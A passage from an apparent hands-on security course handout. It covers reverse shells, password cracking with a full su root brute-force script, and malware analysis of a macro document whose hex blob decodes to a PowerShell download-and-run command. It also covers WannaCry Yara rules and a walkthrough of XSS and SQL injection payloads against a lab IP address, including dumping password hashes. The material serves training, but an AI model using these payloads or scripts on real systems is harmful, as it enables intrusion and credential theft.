  1307.  
  1308.  
  1309.  
  1310. nc TARGETIP 31337
  1311.  
  1312.  
  1313.  
  1314. ---------------------
  1315. Preparing the target for a reverse shell
  1316. $ ncat -lvp 4444
  1317.  
  1318.  
  1319.  
  1320. --open another terminal--
  1321. wget https://www.trustedsec.com/files/simple_py_shell.py
  1322.  
  1323. vi simple_py_shell.py
  1324.  
  1325.  
  1326.  
  1327.  
  1328.  
  1329.  
  1330. -------------------------------
  1331. Tricky shells
  1332.  
  1333. Reference:
  1334. http://securityweekly.com/2011/10/python-one-line-shell-code.html
  1335. http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/
  1336.  
  1337.  
  1338.  
  1339.  
  1340.  
  1341.  
  1342. #############################
  1343. # Reference Videos To Watch #
  1344. #############################
  1345. Here is your third set of youtube videos that I'd like for you to watch:
  1346. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 21-30)
  1347.  
  1348.  
  1349.  
  1350.  
  1351. #################################################
  1352. # Lesson 25: Python Functions & String Handling #
  1353. #################################################
  1354.  
  1355. Python can make use of functions:
  1356. http://www.tutorialspoint.com/python/python_functions.htm
  1357.  
  1358.  
  1359.  
  1360. Python can interact with the 'crypt' function used to create Unix passwords:
  1361. http://docs.python.org/2/library/crypt.html
  1362.  
  1363.  
  1364.  
  1365. Tonight we will see a lot of the split() method so be sure to keep the following references close by:
  1366. http://www.tutorialspoint.com/python/string_split.htm
  1367.  
  1368.  
  1369. Tonight we will see a lot of slicing so be sure to keep the following references close by:
  1370. http://techearth.net/python/index.php5?title=Python:Basics:Slices
  1371.  
  1372.  
  1373.  
  1374.  
  1375.  
  1376. ################################
  1377. # Lesson 26: Password Cracking #
  1378. ################################
  1379.  
  1380. wget https://s3.amazonaws.com/infosecaddictsfiles/htcrack.py
  1381.  
  1382. vi htcrack.py
  1383.  
  1384. vi list.txt
  1385.  
  1386. hello
  1387. goodbye
  1388. red
  1389. blue
  1390. yourname
  1391. tim
  1392. bob
  1393.  
  1394.  
  1395. htpasswd -nd yourname
  1396. - enter yourname as the password
  1397.  
  1398.  
  1399.  
  1400. python htcrack.py joe:7XsJIbCFzqg/o list.txt
  1401.  
  1402.  
  1403.  
  1404.  
  1405. sudo apt-get install -y python-mechanize python-pexpect python-pexpect-doc
  1406.  
  1407. rm -rf mechanize-0.2.5.tar.gz
  1408.  
  1409. sudo /bin/bash
  1410.  
  1411. passwd
  1412. ***set root password***
  1413.  
  1414.  
  1415.  
  1416.  
  1417. vi rootbrute.py
  1418.  
  1419.  
  1420. #!/usr/bin/env python
  1421.  
  1422. import sys
  1423. try:
  1424. import pexpect
  1425. except(ImportError):
  1426. print "\nYou need the pexpect module."
  1427. print "http://www.noah.org/wiki/Pexpect\n"
  1428. sys.exit(1)
  1429.  
  1430. #Change this if needed.
  1431. # LOGIN_ERROR = 'su: incorrect password'
  1432. LOGIN_ERROR = "su: Authentication failure"
  1433.  
  1434. def brute(word):
  1435. print "Trying:",word
  1436. child = pexpect.spawn('/bin/su')
  1437. child.expect('Password: ')
  1438. child.sendline(word)
  1439. i = child.expect (['.+\s#\s',LOGIN_ERROR, pexpect.TIMEOUT],timeout=3)
  1440. if i == 1:
  1441. print "Incorrect Password"
  1442.  
  1443. if i == 2:
  1444. print "\n\t[!] Root Password:" ,word
  1445. child.sendline ('id')
  1446. print child.before
  1447. child.interact()
  1448.  
  1449. if len(sys.argv) != 2:
  1450. print "\nUsage : ./rootbrute.py <wordlist>"
  1451. print "Eg: ./rootbrute.py words.txt\n"
  1452. sys.exit(1)
  1453.  
  1454. try:
  1455. words = open(sys.argv[1], "r").readlines()
  1456. except(IOError):
  1457. print "\nError: Check your wordlist path\n"
  1458. sys.exit(1)
  1459.  
  1460. print "\n[+] Loaded:",len(words),"words"
  1461. print "[+] BruteForcing...\n"
  1462. for word in words:
  1463. brute(word.replace("\n",""))
  1464.  
  1465.  
  1466.  
  1467.  
  1468. References you might find helpful:
  1469. http://stackoverflow.com/questions/15026536/looping-over-a-some-ips-from-a-file-in-python
  1470.  
  1471.  
  1472.  
  1473.  
  1474.  
  1475.  
  1476.  
  1477.  
  1478.  
  1479. wget https://s3.amazonaws.com/infosecaddictsfiles/md5crack.py
  1480.  
  1481. vi md5crack.py
  1482.  
  1483.  
  1484.  
  1485.  
  1486.  
  1487.  
  1488. Why use hexdigest
  1489. http://stackoverflow.com/questions/3583265/compare-result-from-hexdigest-to-a-string
  1490.  
  1491.  
  1492.  
  1493.  
  1494. http://md5online.net/
  1495.  
  1496.  
  1497.  
  1498.  
  1499.  
  1500.  
  1501.  
  1502. wget https://s3.amazonaws.com/infosecaddictsfiles/wpbruteforcer.py
  1503.  
  1504.  
  1505.  
  1506.  
  1507. #############################
  1508. # Reference Videos To Watch #
  1509. #############################
  1510. Here is your forth set of youtube videos that I'd like for you to watch:
  1511. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 31-40)
  1512.  
  1513.  
  1514.  
  1515.  
  1516.  
  1517.  
  1518.  
  1519.  
  1520. ###############################
  1521. # Lesson 28: Malware Analysis #
  1522. ###############################
  1523.  
  1524.  
  1525.  
  1526.  
  1527. ################
  1528. # The Scenario #
  1529. ################
  1530. You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
  1531.  
  1532.  
  1533. The fastest thing you can do is perform static analysis.
  1534.  
  1535. sudo pip install olefile
  1536. infosecaddicts
  1537.  
  1538. mkdir ~/Desktop/oledump
  1539.  
  1540. cd ~/Desktop/oledump
  1541.  
  1542. wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
  1543.  
  1544. unzip oledump_V0_0_22.zip
  1545.  
  1546. wget https://s3.amazonaws.com/infosecaddictsfiles/064016.zip
  1547.  
  1548. unzip 064016.zip
  1549. infected
  1550.  
  1551. python oledump.py 064016.doc
  1552.  
  1553. python oledump.py 064016.doc -s A4 -v
  1554.  
  1555. - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
  1556. - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
  1557.  
  1558.  
  1559. python oledump.py 064016.doc -s A5 -v
  1560.  
  1561. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
  1562.  
  1563.  
  1564. python oledump.py 064016.doc -s A3 -v
  1565.  
  1566. - Look for "GVhkjbjv" and you should see:
  1567.  
  1568. 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
  1569.  
  1570. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
  1571. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
  1572.  
  1573.  
  1574.  
  1575. ###################
  1576. # Static Analysis #
  1577. ###################
  1578.  
  1579. - After logging please open a terminal window and type the following commands:
  1580.  
  1581. cd Desktop/
  1582.  
  1583. wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
  1584.  
  1585. unzip wannacry.zip
  1586. infected
  1587.  
  1588. file wannacry.exe
  1589.  
  1590. mv wannacry.exe malware.pdf
  1591.  
  1592. file malware.pdf
  1593.  
  1594. mv malware.pdf wannacry.exe
  1595.  
  1596. hexdump -n 2 -C wannacry.exe
  1597.  
  1598.  
  1599.  
  1600.  
  1601. ***What is '4d 5a' or 'MZ'***
  1602. Reference:
  1603. http://www.garykessler.net/library/file_sigs.html
  1604.  
  1605.  
  1606.  
  1607.  
  1608.  
  1609. objdump -x wannacry.exe
  1610.  
  1611. strings wannacry.exe
  1612.  
  1613. strings --all wannacry.exe | head -n 6
  1614.  
  1615. strings wannacry.exe | grep -i dll
  1616.  
  1617. strings wannacry.exe | grep -i library
  1618.  
  1619. strings wannacry.exe | grep -i reg
  1620.  
  1621. strings wannacry.exe | grep -i key
  1622.  
  1623. strings wannacry.exe | grep -i rsa
  1624.  
  1625. strings wannacry.exe | grep -i open
  1626.  
  1627. strings wannacry.exe | grep -i get
  1628.  
  1629. strings wannacry.exe | grep -i mutex
  1630.  
  1631. strings wannacry.exe | grep -i irc
  1632.  
  1633. strings wannacry.exe | grep -i join
  1634.  
  1635. strings wannacry.exe | grep -i admin
  1636.  
  1637. strings wannacry.exe | grep -i list
  1638.  
  1639.  
  1640.  
  1641.  
  1642.  
  1643.  
  1644.  
  1645.  
  1646.  
  1647.  
  1648.  
  1649. Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
  1650.  
  1651. Quick Google search for "wannacry ransomeware analysis"
  1652.  
  1653.  
  1654. Reference
  1655. https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
  1656.  
  1657. - Yara Rule -
  1658.  
  1659.  
  1660. Strings:
  1661. $s1 = “Ooops, your files have been encrypted!” wide ascii nocase
  1662. $s2 = “Wanna Decryptor” wide ascii nocase
  1663. $s3 = “.wcry” wide ascii nocase
  1664. $s4 = “WANNACRY” wide ascii nocase
  1665. $s5 = “WANACRY!” wide ascii nocase
  1666. $s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase
  1667.  
  1668.  
  1669.  
  1670.  
  1671.  
  1672.  
  1673.  
  1674.  
  1675. Ok, let's look for the individual strings
  1676.  
  1677.  
  1678.  
  1679. strings wannacry.exe | grep -i ooops
  1680.  
  1681. strings wannacry.exe | grep -i wanna
  1682.  
  1683. strings wannacry.exe | grep -i wcry
  1684.  
  1685. strings wannacry.exe | grep -i wannacry
  1686.  
  1687. strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
  1688.  
  1689.  
  1690.  
  1691.  
  1692.  
  1693.  
  1694.  
  1695. ####################################
  1696. # Tired of GREP - let's try Python #
  1697. ####################################
  1698. Decided to make my own script for this kind of stuff in the future. I
  1699.  
  1700. Reference1:
  1701. https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py
  1702.  
  1703. This is a really good script for the basics of static analysis
  1704.  
  1705. Reference:
  1706. https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
  1707.  
  1708.  
  1709. This is really good for showing some good signatures to add to the Python script
  1710.  
  1711.  
  1712. Here is my own script using the signatures (started this yesterday, but still needs work):
  1713. https://pastebin.com/guxzCBmP
  1714.  
  1715.  
  1716.  
  1717.  
  1718. sudo apt install -y python-pefile
  1719. infosecaddicts
  1720.  
  1721.  
  1722.  
  1723. wget https://pastebin.com/raw/guxzCBmP
  1724.  
  1725.  
  1726. mv guxzCBmP am.py
  1727.  
  1728.  
  1729. vi am.py
  1730.  
  1731. python am.py wannacry.exe
  1732.  
  1733.  
  1734.  
  1735.  
  1736.  
  1737.  
  1738.  
  1739.  
  1740.  
  1741.  
  1742. ##############
  1743. # Yara Ninja #
  1744. ##############
  1745. cd ~/Desktop
  1746.  
  1747. sudo apt-get remove -y yara
  1748. infosecaddcits
  1749.  
  1750. sudo apt -y install libtool
  1751. infosecaddicts
  1752.  
  1753. wget https://github.com/VirusTotal/yara/archive/v3.6.0.zip
  1754.  
  1755.  
  1756. unzip v3.6.0.zip
  1757.  
  1758. cd yara-3.6.0
  1759.  
  1760. ./bootstrap.sh
  1761.  
  1762. ./configure
  1763.  
  1764. make
  1765.  
  1766. sudo make install
  1767. infosecaddicts
  1768.  
  1769. yara -v
  1770.  
  1771. cd ~/Desktop
  1772.  
  1773.  
  1774.  
  1775.  
  1776. NOTE:
  1777. McAfee is giving these yara rules - so add them to the hashes.txt file
  1778.  
  1779. Reference:
  1780. https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
  1781.  
  1782. ----------------------------------------------------------------------------
  1783. rule wannacry_1 : ransom
  1784. {
  1785. meta:
  1786. author = "Joshua Cannell"
  1787. description = "WannaCry Ransomware strings"
  1788. weight = 100
  1789. date = "2017-05-12"
  1790.  
  1791. strings:
  1792. $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
  1793. $s2 = "Wanna Decryptor" wide ascii nocase
  1794. $s3 = ".wcry" wide ascii nocase
  1795. $s4 = "WANNACRY" wide ascii nocase
  1796. $s5 = "WANACRY!" wide ascii nocase
  1797. $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
  1798.  
  1799. condition:
  1800. any of them
  1801. }
  1802.  
  1803. ----------------------------------------------------------------------------
  1804. rule wannacry_2{
  1805. meta:
  1806. author = "Harold Ogden"
  1807. description = "WannaCry Ransomware Strings"
  1808. date = "2017-05-12"
  1809. weight = 100
  1810.  
  1811. strings:
  1812. $string1 = "msg/m_bulgarian.wnry"
  1813. $string2 = "msg/m_chinese (simplified).wnry"
  1814. $string3 = "msg/m_chinese (traditional).wnry"
  1815. $string4 = "msg/m_croatian.wnry"
  1816. $string5 = "msg/m_czech.wnry"
  1817. $string6 = "msg/m_danish.wnry"
  1818. $string7 = "msg/m_dutch.wnry"
  1819. $string8 = "msg/m_english.wnry"
  1820. $string9 = "msg/m_filipino.wnry"
  1821. $string10 = "msg/m_finnish.wnry"
  1822. $string11 = "msg/m_french.wnry"
  1823. $string12 = "msg/m_german.wnry"
  1824. $string13 = "msg/m_greek.wnry"
  1825. $string14 = "msg/m_indonesian.wnry"
  1826. $string15 = "msg/m_italian.wnry"
  1827. $string16 = "msg/m_japanese.wnry"
  1828. $string17 = "msg/m_korean.wnry"
  1829. $string18 = "msg/m_latvian.wnry"
  1830. $string19 = "msg/m_norwegian.wnry"
  1831. $string20 = "msg/m_polish.wnry"
  1832. $string21 = "msg/m_portuguese.wnry"
  1833. $string22 = "msg/m_romanian.wnry"
  1834. $string23 = "msg/m_russian.wnry"
  1835. $string24 = "msg/m_slovak.wnry"
  1836. $string25 = "msg/m_spanish.wnry"
  1837. $string26 = "msg/m_swedish.wnry"
  1838. $string27 = "msg/m_turkish.wnry"
  1839. $string28 = "msg/m_vietnamese.wnry"
  1840.  
  1841.  
  1842. condition:
  1843. any of ($string*)
  1844. }
  1845. ----------------------------------------------------------------------------
  1846.  
  1847.  
  1848. #######################
  1849. # External DB Lookups #
  1850. #######################
  1851.  
  1852. Creating a malware database (sqlite)
  1853. ------------------------------------
  1854. sudo apt install -y python-simplejson python-simplejson-dbg
  1855. infosecaddicts
  1856.  
  1857.  
  1858.  
  1859. wget https://raw.githubusercontent.com/mboman/mart/master/bin/avsubmit.py
  1860.  
  1861.  
  1862.  
  1863. python avsubmit.py -f wannacry.exe -e
  1864.  
  1865.  
  1866. Analysis of the file can be found at:
  1867. http://www.threatexpert.com/report.aspx?md5=84c82835a5d21bbcf75a61706d8ab549
  1868.  
  1869.  
  1870.  
  1871.  
  1872.  
  1873.  
  1874.  
  1875.  
  1876.  
  1877. ###############################
  1878. # Creating a Malware Database #
  1879. ###############################
  1880. Creating a malware database (mysql)
  1881. -----------------------------------
  1882. - Step 1: Installing MySQL database
  1883. - Run the following command in the terminal:
  1884.  
  1885. sudo apt install -y mysql-server
  1886. infosecaddicts
  1887.  
  1888. - Step 2: Installing Python MySQLdb module
  1889. - Run the following command in the terminal:
  1890.  
  1891. sudo apt-get build-dep python-mysqldb
  1892. infosecaddicts
  1893.  
  1894. sudo apt install -y python-mysqldb
  1895. infosecaddicts
  1896.  
  1897. Step 3: Logging in
  1898. Run the following command in the terminal:
  1899.  
  1900. mysql -u root -p (set a password of 'malware')
  1901.  
  1902. - Then create one database by running following command:
  1903.  
  1904. create database malware;
  1905.  
  1906. exit;
  1907.  
  1908. wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
  1909.  
  1910. vi mal_to_db.py (fill in database connection information)
  1911.  
  1912. python mal_to_db.py -i
  1913.  
  1914. ------- check it to see if the files table was created ------
  1915.  
  1916. mysql -u root -p
  1917. malware
  1918.  
  1919. show databases;
  1920.  
  1921. use malware;
  1922.  
  1923. show tables;
  1924.  
  1925. describe files;
  1926.  
  1927. exit;
  1928.  
  1929. ---------------------------------
  1930.  
  1931.  
  1932. - Now add the malicious file to the DB
  1933.  
  1934. python mal_to_db.py -f wannacry.exe -u
  1935.  
  1936.  
  1937.  
  1938. - Now check to see if it is in the DB
  1939.  
  1940. mysql -u root -p
  1941. malware
  1942.  
  1943. mysql> use malware;
  1944.  
  1945. select id,md5,sha1,sha256,time FROM files;
  1946.  
  1947. mysql> quit;
  1948.  
  1949.  
  1950.  
  1951.  
  1952. ######################################
  1953. # PCAP Analysis with forensicPCAP.py #
  1954. ######################################
  1955. cd ~/Desktop
  1956. wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
  1957. sudo easy_install cmd2
  1958.  
  1959. python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap
  1960.  
  1961. ForPCAP >>> help
  1962.  
  1963.  
  1964. Prints stats about PCAP
  1965. ForPCAP >>> stat
  1966.  
  1967.  
  1968. Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
  1969. ForPCAP >>> dns
  1970.  
  1971. ForPCAP >>> show
  1972.  
  1973.  
  1974. Prints all destination ports from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
  1975. ForPCAP >>> dstports
  1976.  
  1977. ForPCAP >>> show
  1978.  
  1979.  
  1980. Prints the number of ip source and store them.
  1981. ForPCAP >>> ipsrc
  1982.  
  1983.  
  1984. Prints the number of web's requests and store them
  1985. ForPCAP >>> web
  1986.  
  1987.  
  1988. Prints the number of mail's requests and store them
  1989. ForPCAP >>> mail
  1990.  
  1991.  
  1992.  
  1993. ###################
  1994. # Memory Analysis #
  1995. ###################
  1996. cd /home/malware/Desktop/Banking\ Troubles/Volatility
  1997.  
  1998. python volatility
  1999. python volatility pslist -f ../hn_forensics.vmem
  2000. python volatility connscan2 -f ../hn_forensics.vmem
  2001. python volatility memdmp -p 888 -f ../hn_forensics.vmem
  2002. python volatility memdmp -p 1752 -f ../hn_forensics.vmem
  2003. ***Takes a few min***
  2004. strings 1752.dmp | grep "^http://" | sort | uniq
  2005. strings 1752.dmp | grep "Ahttps://" | uniq -u
  2006. cd ..
  2007. foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2
  2008. cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/
  2009. cat audit.txt
  2010. cd pdf
  2011. ls
  2012. grep -i javascript *.pdf
  2013.  
  2014.  
  2015.  
  2016. cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf
  2017. wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
  2018. unzip pdf-parser_V0_6_4.zip
  2019. python pdf-parser.py -s javascript --raw 00600328.pdf
  2020. python pdf-parser.py --object 11 00600328.pdf
  2021. python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js
  2022.  
  2023. cat malicious.js
  2024.  
  2025.  
  2026. *****Sorry - no time to cover javascript de-obfuscation today*****
  2027.  
  2028.  
  2029. cd /home/malware/Desktop/Banking\ Troubles/Volatility/
  2030. python volatility files -f ../hn_forensics.vmem > files
  2031. cat files | less
  2032. python volatility malfind -f ../hn_forensics.vmem -d out
  2033. ls out/
  2034. python volatility hivescan -f ../hn_forensics.vmem
  2035. python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
  2036. for file in $(ls *.dmp); do echo $file; strings $file | grep bankofamerica; done
  2037.  
  2038.  
  2039.  
  2040. Start with simple Firefox Addons:
  2041.  
  2042. - ShowIP https://addons.mozilla.org/en-US/firefox/addon/showip/
  2043. - Server Spy https://addons.mozilla.org/en-US/firefox/addon/server-spy/
  2044. - FoxyProxy https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
  2045. - Tamper Data https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
  2046. - Wapalyzer https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/
  2047.  
  2048. A good list of web app testing add ons for Firefox:
  2049. https://addons.mozilla.org/en-us/firefox/collections/adammuntner/webappsec/
  2050.  
  2051.  
  2052.  
  2053.  
  2054.  
  2055.  
  2056.  
  2057. ##################################
  2058. # Basic: Web Application Testing #
  2059. ##################################
  2060.  
  2061. Most people are going to tell you reference the OWASP Testing guide.
  2062. https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
  2063.  
  2064. I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
  2065.  
  2066.  
  2067. The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
  2068.  
  2069. 1. Does the website talk to a DB?
  2070. - Look for parameter passing (ex: site.com/page.php?id=4)
  2071. - If yes - try SQL Injection
  2072.  
  2073. 2. Can I or someone else see what I type?
  2074. - If yes - try XSS
  2075.  
  2076. 3. Does the page reference a file?
  2077. - If yes - try LFI/RFI
  2078.  
  2079. Let's start with some manual testing against 54.245.184.121
  2080.  
  2081.  
  2082. Start here:
  2083. http://54.245.184.121/
  2084.  
  2085.  
  2086. There's no parameter passing on the home page so the answer to question 1 is NO.
  2087. There is however a search box in the top right of the webpage, so the answer to question 2 is YES.
  2088.  
  2089. Try an XSS in the search box on the home page:
  2090. <script>alert(123);</script>
  2091.  
  2092. Doing this gives us the following in the address bar:
  2093. http://54.245.184.121/BasicSearch.aspx?Word=<script>alert(123);</script>
  2094.  
  2095. Ok, so we've verified that there is XSS in the search box.
  2096.  
  2097. Let's move on to the search box in the left of the page.
  2098.  
  2099. Let's give the newsletter signup box a shot
  2100.  
  2101. Moving on to the login page.
  2102. http://54.245.184.121/login.aspx
  2103.  
  2104. I entered a single quote (') for both the user name and the password. I got the following error:
  2105.  
  2106. -----------------------------------------------------------------
  2107. 'Users//User[@Name=''' and @Password=''']' has an invalid token.
  2108. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
  2109.  
  2110. Exception Details: System.Xml.XPath.XPathException: 'Users//User[@Name=''' and @Password=''']' has an invalid token.
  2111.  
  2112. Source Error:
  2113.  
  2114.  
  2115. Line 112: doc.Load(Server.MapPath("") + @"\AuthInfo.xml");
  2116. Line 113: string credential = "Users//User[@Name='" + UserName + "' and @Password='" + Password + "']";
  2117. Line 114: XmlNodeList xmln = doc.SelectNodes(credential);
  2118. Line 115: //String test = xmln.ToString();
  2119. Line 116: if (xmln.Count > 0)
  2120.  
  2121. -----------------------------------------------------------------
  2122.  
  2123.  
  2124. Hmm....System.Xml.XPath.XPathException.....that's not SQL.
  2125.  
  2126. WTF is this:
  2127. Line 112: doc.Load(Server.MapPath("") + @"\AuthInfo.xml");
  2128.  
  2129.  
  2130.  
  2131.  
  2132. In this case you'll have the trap the request with a proxy like:
  2133. - Firefox Tamper Data
  2134. - Burp Suite http://www.portswigger.net/Burp/proxy.html
  2135. - WebScarab https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
  2136. - Rat Proxy https://code.google.com/p/ratproxy/
  2137. - Zap Proxy https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
  2138. - Paros http://sourceforge.net/projects/paros/
  2139.  
  2140.  
  2141.  
  2142. Let's go back to that page error message.....
  2143.  
  2144.  
  2145. Let's check it out:
  2146. http://54.245.184.121/AuthInfo.xml
  2147.  
  2148. Looks like we found passwords!!!!!!!!!!
  2149.  
  2150.  
  2151. Looks like there no significant new functionality after logging in with the stolen credentials.
  2152.  
  2153. Going back to the homepage...let's see if we can see anything. Figured I'd click on one of the links
  2154.  
  2155.  
  2156. http://54.245.184.121/bookdetail.aspx?id=2
  2157.  
  2158.  
  2159. Ok, there is parameter passing (bookdetail.aspx?id=2).
  2160.  
  2161. The page name is: bookdetail.aspx
  2162. The parameter name is: id
  2163. The paramber value is: 2
  2164.  
  2165.  
  2166. Let's try throwing a single quote (') in there:
  2167.  
  2168. http://54.245.184.121/bookdetail.aspx?id=2'
  2169.  
  2170.  
  2171. I get the following error:
  2172.  
  2173. Unclosed quotation mark after the character string ''.
  2174. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
  2175.  
  2176. Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.
  2177.  
  2178.  
  2179.  
  2180.  
  2181.  
  2182.  
  2183.  
  2184.  
  2185.  
  2186.  
  2187. #########################################################################################
  2188. # SQL Injection #
  2189. # https://s3.amazonaws.com/infosecaddictsfiles/1-Intro_To_SQL_Intection.pptx #
  2190. #########################################################################################
  2191.  
  2192.  
  2193. - Another quick way to test for SQLI is to remove the paramter value
  2194.  
  2195.  
  2196. #############################
  2197. # Error-Based SQL Injection #
  2198. #############################
  2199. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
  2200. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
  2201. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
  2202. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
  2203. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
  2204. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
  2205. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
  2206. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
  2207. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
  2208.  
  2209.  
  2210.  
  2211.  
  2212. #############################
  2213. # Union-Based SQL Injection #
  2214. #############################
  2215. http://54.245.184.121/bookdetail.aspx?id=2 order by 100--
  2216. http://54.245.184.121/bookdetail.aspx?id=2 order by 50--
  2217. http://54.245.184.121/bookdetail.aspx?id=2 order by 25--
  2218. http://54.245.184.121/bookdetail.aspx?id=2 order by 10--
  2219. http://54.245.184.121/bookdetail.aspx?id=2 order by 5--
  2220. http://54.245.184.121/bookdetail.aspx?id=2 order by 6--
  2221. http://54.245.184.121/bookdetail.aspx?id=2 order by 7--
  2222. http://54.245.184.121/bookdetail.aspx?id=2 order by 8--
  2223. http://54.245.184.121/bookdetail.aspx?id=2 order by 9--
  2224. http://54.245.184.121/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
  2225.  
  2226. We are using a union select statement because we are joining the developer's query with one of our own.
  2227. Reference:
  2228. http://www.techonthenet.com/sql/union.php
  2229. The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
  2230. It removes duplicate rows between the various SELECT statements.
  2231.  
  2232. Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
  2233.  
  2234. http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
  2235.  
  2236. Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
  2237.  
  2238. http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
  2239. http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
  2240. http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
  2241. http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
  2242.  
  2243.  
  2244.  
  2245.  
  2246.  
  2247. - Another way is to see if you can get the backend to perform an arithmetic function
  2248. http://54.245.184.121/bookdetail.aspx?id=(2)
  2249. http://54.245.184.121/bookdetail.aspx?id=(4-2)
  2250. http://54.245.184.121/bookdetail.aspx?id=(4-1)
  2251.  
  2252.  
  2253.  
  2254. http://54.245.184.121/bookdetail.aspx?id=2 or 1=1--
  2255. http://54.245.184.121/bookdetail.aspx?id=2 or 1=2--
  2256. http://54.245.184.121/bookdetail.aspx?id=1*1
  2257. http://54.245.184.121/bookdetail.aspx?id=2 or 1 >-1#
  2258. http://54.245.184.121/bookdetail.aspx?id=2 or 1<99#
  2259. http://54.245.184.121/bookdetail.aspx?id=2 or 1<>1#
  2260. http://54.245.184.121/bookdetail.aspx?id=2 or 2 != 3--
  2261. http://54.245.184.121/bookdetail.aspx?id=2 &0#
  2262.  
  2263.  
  2264.  
  2265.  
  2266.  
  2267. ###############################
  2268. # Blind SQL Injection Testing #
  2269. ###############################
  2270. Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
  2271.  
  2272. 3 - Total Characters
  2273. http://54.245.184.121/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
  2274. http://54.245.184.121/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
  2275. http://54.245.184.121/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
  2276.  
  2277. Let's go for a quick check to see if it's DBO
  2278. http://54.245.184.121/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
  2279.  
  2280. Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
  2281.  
